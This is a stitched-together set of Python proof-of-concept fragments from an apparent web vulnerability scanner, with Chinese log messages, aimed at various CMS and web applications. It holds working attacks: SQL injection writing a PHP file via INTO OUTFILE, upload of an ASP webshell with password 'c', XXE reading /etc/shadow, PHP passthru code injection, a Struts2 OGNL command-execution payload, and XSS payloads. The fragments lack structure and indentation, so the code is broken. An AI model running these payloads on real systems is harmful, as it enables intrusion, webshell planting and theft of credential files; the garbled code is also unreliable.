document_root = ''
payload = '/gxlcms/index.php?s=Admin-Index-phpinfo'
url = self.target + payload
r = requests.get(url)
p = re.compile(r'DOCUMENT_ROOT\'\]</td><td class=\"v\">(.+)</td>')
if p.findall(r.text):
document_root = p.findall(r.text)[0]
self.output.info('获取到网站绝对路径{}'.format(document_root))
# 上传文件
payload = '/gxlcms/index.php?s=Admin-Data-upsql'
url = self.target + payload
data = "sql=select '<?php phpinfo();echo md5(c)?>' INTO OUTFILE '{}/gxlcms/cscan.php';&submit=%E6%8F%90+%E4%BA%A4&hash=ab2af3933aa472eba3a25e8d69852e55".format(
document_root)
requests.post(url, data=data)
verify_url = self.target + '/gxlcms/cscan.php'
r = requests.get(verify_url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
vun_url = arg + "/Comm/UploadFile/webUpload.aspx?AttId=9d37b73795649038.cer&FilePath=/../web/"
data = '''
------WebKitFormBoundarySi7aFG5fhvI14Vbv
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUJLTkxNTA4NDgxZGT4FQnTj63sW6bItFI88C2Fes3jcRPos/LRQn4yOHqiRw==
------WebKitFormBoundarySi7aFG5fhvI14Vbv
Content-Disposition: form-data; name="fa"; filename="9d37b73795649038.cer"
Content-Type: application/x-x509-ca-cert
<%eval request("c")%>
------WebKitFormBoundarySi7aFG5fhvI14Vbv--
'''
r = requests.post(vun_url, data=data)
res = r.text
verify_url = arg + "9d37b73795649038.cer"
if r.status_code == 200:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞;\n已上传webshell地址:{url}密码为c,请及时删除。'.
format(target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = "/lwUpLoadTemp/null.jsp"
verify_url = '{target}'.format(target=self.target)+payload
target_url = '{target}'.format(
target=self.target)+"/lwUpLoad_action.jsp"
file_v_jsp = '''<%@ page import="java.util.*,java.io.*" %>
<%@ page import="java.io.*"%>
<%
String path=application.getRealPath(request.getRequestURI());
File d=new File(path);
out.println(path);
%>
<% out.println("payload=true");%>
'''
files = {'theFile': ('v.jsp', file_v_jsp, 'text/plain')}
response = requests.post(target_url, files=files) # 上传
response = requests.get(verify_url) # 验证
content = response.text
if 'payload=true' in content:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
filename = '/etc/shadow'
payload = r'<?xml version="1.0" encoding="ISO-8859-1"?>'\
'<?xml version="1.0" encoding="ISO-8859-1"?>'\
'<!DOCTYPE foo ['\
'<!ELEMENT foo ANY >'\
'<!ENTITY xxe SYSTEM "file://{file}" >]>' \
'<Request>'\
'<Username>root</Username>'\
'<Password>root</Password>'\
'</Request>'.format(file=filename)
expurl = arg + '/api/login'
try:
response = requests.post(expurl, data=payload, timeout=50)
if re.match('root:.+?:0:0:.+?:.+?:.+?',
response.text) and response.status_code == 200:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
vul_url = self.target + payload
vul_header = {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type":
"application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Content-Length": "115",
"Cookie": self.get_option("cookies"),
"Connection": "close",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
data = '''_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1'''
_response = requests.post(vul_url, data=data, header=vul_header)
if '''{"response":"Success","details":"}''' in _response.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先注册用户。
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
payload = "/my.php?item=buddylist[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,md5(c),0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1"
data = "formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
url = self.target + payload
r = requests.post(url, cookies=cookies, data=data)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 登录用户
self.output.info('开始对网站进行跨站脚本漏洞检查...')
payload = '/guest/index.html'
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Cookie': '%s' % self.get_option('cookies')
}
data = "title=%3Csvg%2Fonload%3Dalert%28%27cscan%27%29%3E&name=test&email=test%40test.t&content=test"
url = self.target + payload
self.output.info('对网站/guest/index.html页面进行跨站请求验证...')
r = requests.post(url, headers=headers, data=data)
if "<script>alert('cscan')</script>" in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
# 构造xss payload
self.output.info('正在构造xss payload')
payload1 = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''
vul_url1 = arg + payload1
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': self.get_option('cookie')
}
response1 = requests.post(vul_url1, headers=headers, data=data)
# 验证xss是否成功触发
self.output.info('验证xss是否成功触发')
payload2 = "/index.php?s=/admin/articlem/index.html&_=1532271572256"
vul_url2 = arg + payload2
response2 = requests.get(vul_url2, headers=headers)
if response2.status_code == 200 and '<td><img src=x onerror=alert(1)></td>' in response2.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
data = {
'username':
'''cscan''',
'email':
'''cscan''',
'age':
"""'+ (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo 92933839f1efb2da9a4799753ee8d79c').getInputStream())) + '"""
}
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
request = requests.post(
'{target}/user.action'.format(target=self.target), data=data)
r = request.text
if '92933839f1efb2da9a4799753ee8d79c' in r:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 登录用户
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
# 根据安装目录不同payload可能不同,需根据实际情况判断
payload = '/upload/member.php?action=cz'
data = "cckkey=aaaa0' or updatexml(1,concat(0x7e,(md5(c))),0) or '"
url = self.target + payload
r = requests.post(url, headers=cookies, data=data)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target
req = requests.get(url)
if req.status_code == 200:
po_ids = re.findall(r'name="po_id" value="(\d+)"', req.text)
for po_id in po_ids:
verify_url = url + '/poll_update.php'
post = (
"_SERVER[REMOTE_ADDR]=86117&po_id=%s&gb_poll=1=1 and(select 1 from(select"
"count(*),concat((select md5(123)),floor(rand(0)*2))x from information_schema.tables group by"
"x)a)") % po_id
reqp = requests.post(verify_url, data=post)
if reqp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in reqp.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))